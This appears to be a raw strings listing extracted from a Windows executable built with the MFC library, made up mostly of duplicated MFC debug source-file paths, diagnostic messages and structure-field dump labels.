f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpane.cpp
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbutton.cpp
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. "Not Supported" exception
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::CreateFromOleData. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
CMFCToolBarButton::PrepareDrag. OLE exception: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabctrl.h
SetActiveTab: illegal tab number %d
SetActiveTab: illegal tab number %d
EnsureVisible: illegal tab number %d
EnsureVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj2.cpp
m_stgMedium.tymed =
m_stgMedium.tymed =
m_formatEtc.tymed =
m_formatEtc.tymed =
m_formatEtc.lindex =
m_formatEtc.lindex =
m_formatEtc.dwAspect =
m_formatEtc.dwAspect =
m_formatEtc.pdt =
m_formatEtc.pdt =
m_formatEtc.cfFormat =
m_formatEtc.cfFormat =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop1.cpp
windows
windows
m_rectStartDrag.bottom =
m_rectStartDrag.bottom =
m_rectStartDrag.right =
m_rectStartDrag.right =
m_rectStartDrag.top =
m_rectStartDrag.top =
m_rectStartDrag.left =
m_rectStartDrag.left =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdropdowntoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubutton.cpp
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
CMFCToolBarMenuButton::CreateMenu(): Can't add menu item: %d
Last error = %x
Last error = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtrackmouse.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarmenubuttonsbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarmenubuttonsbutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxwinappex.cpp
ShowCmd
ShowCmd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsettingsstore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxregpath.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttoncustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmini.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsystemmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtoolbarsystemmenubutton.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxcmn2.inl
Can't invoke command: %s
Can't invoke command: %s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxusertool.cpp
Empty command in user-defined tool: %d
Empty command in user-defined tool: %d
CUserTool::CopyIconToClipboard error. Error code = %x
CUserTool::CopyIconToClipboard error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsound.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenubar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabctrl.cpp
RemoveTab: illegal tab number %d
RemoveTab: illegal tab number %d
ShowTab: illegal tab number %d
ShowTab: illegal tab number %d
IsTabVisible: illegal tab number %d
IsTabVisible: illegal tab number %d
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxdockablepane.h
CMFCTabCtrl::SetImageList Can't load bitmap: %x
CMFCTabCtrl::SetImageList Can't load bitmap: %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\tooltip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockingpanesrow.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscustomizedialog.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
@f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdrawmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbaseribbonelement.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxbaseribbonelement.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcontrolrenderer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsmenupropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonminitoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcustomizemenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxshowallbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmenutearoffmanager.cpp
%c%d%c%s
%c%d%c%s
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpout.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fixalloc.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgclr.cpp
m_cc.lpCustColors
m_cc.lpCustColors
m_cc.Flags =
m_cc.Flags =
m_cc.rgbResult =
m_cc.rgbResult =
m_cc.hwndOwner =
m_cc.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\ccdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\bardock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidedocksite.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxglobalutils.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxbasetabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanedivider.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmultipaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainer.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtabbedpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxtabbedpane.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxautohidebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpanecontainermanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbar.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
?CMDIChildWnd
?CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmdi.cpp
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
Warning: CMDIFrameWnd::OnCreateClient: failed to create MDICLIENT. GetLastError returns 0x%8.8X
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbartabctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxoutlookbartabctrl.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorbar.cpp
Hex={X,X,X}
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanelmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspaneframewnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonquickaccesstoolbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncategory.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpanel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonedit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonpalettegallery.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxribbonpalettegallery.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionbar.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpanebutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxacceleratorkey.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdragframeimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingmanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxolecntrframewndex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcaptionmenubutton.cpp
CMDIClientAreaWnd
CMDIClientAreaWnd
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmdiclientareawnd.cpp
CMDIClientAreaWnd::OnCreate: can't create tabs window
CMDIClientAreaWnd::OnCreate: can't create tabs window
Unknown exception in CMDIClientAreaWnd::SaveState()!
Unknown exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
CArchiveException exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
Memory exception in CMDIClientAreaWnd::SaveState()!
%sMDIClientArea-%d
%sMDIClientArea-%d
Unknown exception in CMDIClientAreaWnd::LoadState()!
Unknown exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
CArchiveException exception in CMDIClientAreaWnd::LoadState()!
Memory exception in CMDIClientAreaWnd::LoadState!
Memory exception in CMDIClientAreaWnd::LoadState!
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledoc1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpreviewviewex.cpp
Malformed Page Description string. Could not get string %d.
Malformed Page Description string. Could not get string %d.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxfullscreenimpl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledocip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olecli1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olemsgf.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\occlock.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxlistctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarcomboboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxspinbuttonctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolorpopupmenu.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxpropertygridtooltipctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
?f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxheaderctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarfontcombobox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
may cause RIPs under debug Windows.
may cause RIPs under debug Windows.
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledobj1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxmt.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin3.inl
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxdockablepaneadapter.cpp
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxrecentdocksiteinfo.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\fileshrd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtooltipctrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousemanager.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dockstat.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarbuttonslistbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximageeditordialog.cpp
CMFCImageEditorDialog::Copy() error. Error code = %x
CMFCImageEditorDialog::Copy() error. Error code = %x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afximagepaintarea.cpp
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarskeyboardpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistpropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarsoptionspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarstoolspropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxmousepropertypage.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonkeytip.cpp
faulted while dumping object at $%p, %u bytes long
faulted while dumping object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
a %hs object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an invalid object at $%p, %u bytes long
an object at $%p, %u bytes long
an object at $%p, %u bytes long
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dumpinit.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxoutlookbarpaneadapter.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbareditboxbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonlabel.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonbuttonsgroup.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl4.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarslistcheckbox.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribboncolorbutton.cpp
RGB(%d, %d, %d)
RGB(%d, %d, %d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolormenubutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxcolordialog.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtaskspane.cpp
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxribbonundobutton.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockinghighlighterwnd.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxsmartdockingguide.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxsmartdockingguide.h
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olesvr1.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewscrl.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewprev.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledlgs2.cpp
m_bz.hTask =
m_bz.hTask =
m_bz.hResource =
m_bz.hResource =
m_bz.lpszTemplate =
m_bz.lpszTemplate =
m_bz.hInstance =
m_bz.hInstance =
m_bz.lCustData =
m_bz.lCustData =
m_bz.lpszCaption =
m_bz.lpszCaption =
m_bz.hWndOwner =
m_bz.hWndOwner =
m_bz.dwFlags =
m_bz.dwFlags =
m_bz.cbStruct =
m_bz.cbStruct =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\dlgprnt.cpp
m_pd.nCopies =
m_pd.nCopies =
m_pd.nMaxPage =
m_pd.nMaxPage =
m_pd.nMinPage =
m_pd.nMinPage =
m_pd.nToPage =
m_pd.nToPage =
m_pd.nFromPage =
m_pd.nFromPage =
m_pd.Flags =
m_pd.Flags =
m_pd.hDC =
m_pd.hDC =
m_pd.hwndOwner =
m_pd.hwndOwner =
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appprnt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\afxtoolbarscommandslistbox.cpp
